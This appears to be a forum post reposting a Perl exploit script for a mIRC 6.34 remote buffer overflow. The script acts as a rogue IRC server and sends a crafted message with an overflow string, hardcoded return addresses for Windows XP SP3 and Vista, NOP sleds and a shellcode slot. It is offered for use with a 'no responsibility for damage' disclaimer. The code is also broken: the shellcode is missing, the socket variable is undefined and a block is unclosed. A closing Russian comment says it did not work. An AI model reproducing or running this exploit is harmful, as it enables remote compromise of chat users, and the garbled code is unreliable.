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mIRC 6.34 Remote Buffer Overflow Exploit


Midle Weight
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# mIRC 6.34 Remote Buffer Overflow Exploit
# Exploit by SkD (skdrat <at> hotmail <.> com)
# ----------------------------------------
# A day's work of debugging and looking at mIRC.
# Tested on Windows XP SP3 English and Windows Vista SP0.
# Credits to securfrog for publishing the PoC.
# Author has no responsibility over the damage you do with this!
# Note: You might change the addresses for Vista;)
# ----------------------------------------

use IO::Socket;

print "\n[x] mIRC 6.34 Remote Buffer Overflow Exploit\n";
print "[x] Exploit by SkD (skdrat@ hotmail.com)\n\n";
print "[x] Use: mirc_exp.pl <port> <OS = 1 for XP Sp3 AND 2 for Vista SP0>\n[x] Example: mirc_exp.pl 6667 0\n\n";


my $sock=new IO::Socket::INET (
Listen => 1,

LocalAddr => '',

LocalPort => $ARGV[0],

Proto => 'tcp');

die unless $sock;

# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =

print "[x] Listening on port ".$ARGV[0]."..\r\n";
print "[x] Got a user!\r\n";
$overflow = "\x41" x 307;
$overflow2 = "B" x 12;
$eip_vista = "\x66\x1c\xc2\x76"; #Normaliz.DLL pop pop ret
$eip2_vista = "\xd3\xdb\x54\x77"; #MSFCT.DLL jmp esp
$eip_xpsp3 = "\xd1\xfb\x92\x77"; #SETUPAPI.DLL 0x7792FBD1 pop eax pop ret
$eip2_xpsp3 = "\xb7\x87\x9d\x77"; #SETUPAPI.DLL 0x779D87B7 jmp esp
$addr = "\xb5\xb5\xfd\x7f";
$nop_sled = "\x90" x 4;
$jmp = "\xEB\x03\xFF\xFF";

print "[x] Sending packets..\r\n";

print $s ":my_irc_server.com 001 wow :Welcome to the Internet Relay Network wow\r\n";
if($ARGV[1] == "1"){
print $s ":".$overflow.$eip_xpsp3.$addr.$nop_sled.$eip2_xpsp3.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled." PRIVMSG wow : /FINGER wow.\r\n";
print $s ":".$overflow.$eip_vista.$addr.$nop_sled.$eip2_vista.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled." PRIVMSG wow : /FINGER wow.\r\n";
print "[x] Check it out!\r\n";
тестил в том виде что на милворме висит, моя мирка даж не почесалась